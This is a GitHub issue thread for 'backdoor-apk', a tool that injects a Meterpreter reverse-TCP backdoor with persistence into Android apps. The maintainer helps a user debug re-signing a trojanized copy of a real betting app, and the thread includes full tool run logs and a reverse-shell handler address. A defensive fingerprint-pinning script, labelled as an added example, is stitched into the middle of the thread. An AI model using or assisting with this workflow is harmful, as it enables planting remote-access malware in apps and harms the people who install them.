dana-at-cp / backdoor-apk

backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.
Apache License 2.0

Failed to sign recompiled apk: jarsigner error #14

Closed Tirititelu closed 8 years ago

Tirititelu commented 8 years ago

Hi,

I tried again with your new version but didn't get the backdoor-apk.

[*] Generating reverse tcp meterpreter payload...done.
[+] Handle the meterpreter connection at: XX.XXX:XXX.XXX:4444
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Recompiling original project with backdoor...done.
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[!] Failed to sign recompiled APK

run.log:

I: Copying unknown files/dir...
dname value:
Generando par de claves RSA de 2.048 bits para certificado autofirmado (SHA256withRSA) con una validez de 10.000 días para:
[Almacenando /root/Descargas/backdoor-apk-master/backdoor-apk/signing.keystore]
jarsigner error: java.lang.RuntimeException: certificate exception: Empty issuer DN not allowed in X509Certificates
Forcing cleanup due to a failure or error state!

Can you help me?

Thanks

dana-at-cp commented 8 years ago

Is the original APK file signed? The script looks for "*.RSA" in the original archive and attempts to extract the dname value from the original cert.

Tirititelu commented 8 years ago

signing.keystore.zip

Yes, I tried with several APKs but the same error appears... "jarsigner error: java.lang.RuntimeException: certificate exception: Empty issuer DN not allowed in X509Certificates". I have tried with this APK, for example: http://www.bet.es/wp-content/uploads/image/Bwin/Bwin-app-android.apk

signing.keystore attached.

dana-at-cp commented 8 years ago

Did you modify the script in any way? I checked the APK and confirmed that there is a certificate in the archive.

root@kali:/tmp# unzip -l Bwin-app-android.apk |grep ".RSA"
      942  2015-11-02 14:44   META-INF/CERT.RSA
root@kali:/tmp# unzip -p Bwin-app-android.apk META-INF/CERT.RSA |keytool -printcert
Owner: CN=Benjamin Ferrari, OU=NDC, O=bwin, L=Gibraltar, ST=Gibraltar, C=Gl
Issuer: CN=Benjamin Ferrari, OU=NDC, O=bwin, L=Gibraltar, ST=Gibraltar, C=Gl
Serial number: 4d5117a9
Valid from: Tue Feb 08 05:15:05 EST 2011 until: Mon Jun 11 06:15:05 EDT 3010
Certificate fingerprints:
     MD5: E5:A4:43:75:FD:92:90:BB:6D:18:D4:09:D5:63:1D:5D
     SHA1: 8A:38:EE:1D:92:81:A0:63:1C:A6:BF:EE:1C:04:A2:10:BB:D5:62:96
     SHA256: 34:CB:DE:AC:23:85:6A:B6:3E:BD:D2:60:89:A1:2E:72:A6:56:14:78:A0:5B:17:23:16:E3:C5:BF:BA:B0:2B:C4
Signature algorithm name: SHA1withRSA
Version: 3
root@kali:/tmp#

The script should process this APK fine.
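
Added example, not part of the thread or of the project's code: the thread shows the script reading the dname from the original certificate and then generating its own RSA signing key, so a verifier that trusts the Owner/Issuer line alone cannot tell the original signer from a re-signed copy. The check below pins the SHA256 fingerprint printed above instead; the function names and the second sample (a made-up fingerprint) are assumptions for illustration.

```shell
#!/bin/sh
# Added example: pin the signer by certificate fingerprint, not by DN.
# Input is `keytool -printcert` text on stdin, e.g. (command from the thread):
#   unzip -p app.apk META-INF/CERT.RSA | keytool -printcert | check_signer

# Pinned values: the original certificate as printed in the thread.
PINNED_OWNER='CN=Benjamin Ferrari, OU=NDC, O=bwin, L=Gibraltar, ST=Gibraltar, C=Gl'
PINNED_SHA256='34:CB:DE:AC:23:85:6A:B6:3E:BD:D2:60:89:A1:2E:72:A6:56:14:78:A0:5B:17:23:16:E3:C5:BF:BA:B0:2B:C4'

# cert_field NAME: value of the first "NAME: value" line on stdin.
cert_field() {
    sed -n "s/^[[:space:]]*$1:[[:space:]]*//p" | head -n 1
}

# check_signer: 0 = pinned cert, 1 = different cert, 2 = nothing to compare.
check_signer() {
    dump=$(cat)
    owner=$(printf '%s\n' "$dump" | cert_field Owner)
    sha=$(printf '%s\n' "$dump" | cert_field SHA256 | tr 'a-f' 'A-F')
    if [ -z "$sha" ]; then            # fail closed on an unparsable dump
        echo "UNVERIFIED: no SHA256 fingerprint found"; return 2
    fi
    if [ "$sha" = "$PINNED_SHA256" ]; then
        echo "OK: pinned certificate"; return 0
    fi
    if [ "$owner" = "$PINNED_OWNER" ]; then
        echo "ALERT: pinned DN but different key (re-signed)"; return 1
    fi
    echo "MISMATCH: unknown signer"; return 1
}

# Sample: the original certificate's fields as shown in the thread.
sample_original() {
    printf 'Owner: %s\nCertificate fingerprints:\n     SHA256: %s\n' \
        "$PINNED_OWNER" "$PINNED_SHA256"
}

# Constructed sample: same DN as the pinned cert, made-up fingerprint.
sample_resigned() {
    printf 'Owner: %s\nCertificate fingerprints:\n     SHA256: %s\n' \
        "$PINNED_OWNER" \
        '00:11:22:33:44:55:66:77:88:99:AA:BB:CC:DD:EE:FF:00:11:22:33:44:55:66:77:88:99:AA:BB:CC:DD:EE:FF'
}

sample_original | check_signer || true
sample_resigned | check_signer || true
```

This reads the v1 (JAR) signature block only; for APKs that carry APK Signature Scheme v2 or later, take the certificate digest from `apksigner verify --print-certs` instead.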

Tirititelu commented 8 years ago

I only changed the IP and PORT for the reverse_tcp connection, but I tried with no changes with the same result... :-(

dana-at-cp commented 8 years ago

Try the latest version of the script off of the master branch. If it still fails then attach the full output of run.log and I'll have another look.

dana-at-cp commented 8 years ago

I ran the latest version of the script on the APK you shared. It was processed fine. Check your environment. Make sure the APK is in the same working directory as the script at runtime.

root@kali:~/Scripts/github/backdoor-apk/backdoor-apk# ./backdoor-apk.sh Bwin-app-android.apk 
[*] Generating RAT APK file...done.
[+] Using payload: android/meterpreter/reverse_tcp
[+] Handle the reverse connection at: 10.6.9.31:1337
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.
root@kali:~/Scripts/github/backdoor-apk/backdoor-apk# sha256sum Bwin-app-android.apk 
8f771e547b770fa4ed85b4df647e03e8ad814a9b04cf7d23fbd47e9557618f47  Bwin-app-android.apk
root@kali:~/Scripts/github/backdoor-apk/backdoor-apk#

Tirititelu commented 8 years ago

I tried again and the same happened:

root@kaliSanna:~/backdoor-apk-master/backdoor-apk# ./backdoor-apk.sh Bwin-app-android.apk
[*] Generating RAT APK file...done.
[+] Using payload: android/meterpreter/reverse_tcp
[+] Handle the reverse connection at: 10.6.9.31:1337
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[!] Failed to sign recompiled APK

I am on a Kali Linux Sanna, but I tried on a clean Kali Linux Sanna with the same result. I tried on a Kali Linux 2016 but it doesn't work, in this case at:

[!] Failed to sign recompiled APK

I attach both logs.

Thanks!

run_Kali_Sanna.log.zip run Kali_2016.log.tar.gz

Tirititelu commented 8 years ago

No idea?

Thx!